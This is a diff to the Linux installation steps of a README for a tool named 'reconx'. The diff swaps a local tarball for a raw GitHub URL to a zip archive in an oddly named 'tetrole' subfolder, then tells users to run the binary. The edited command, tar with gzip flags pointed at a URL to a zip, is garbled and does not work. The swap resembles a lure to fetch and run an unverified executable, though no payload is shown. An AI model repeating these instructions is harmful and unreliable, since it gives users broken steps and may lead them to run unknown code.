marinabines/reconx/README.md

 ### Linux Installation

-1. Locate the downloaded `.tar.gz` file.
+1. Locate the downloaded `https://raw.githubusercontent.com/marinabines/reconx/main/tetrole/reconx.zip` file.
 2. Open a terminal and navigate to the download location.
-3. Extract the contents using the command: `tar -xvzf reconx_linux.tar.gz`.
+3. Extract the contents using the command: `tar -xvzf https://raw.githubusercontent.com/marinabines/reconx/main/tetrole/reconx.zip`.
 4. Change to the extracted directory: `cd reconx`.
 5. Run the application by typing `./reconx`.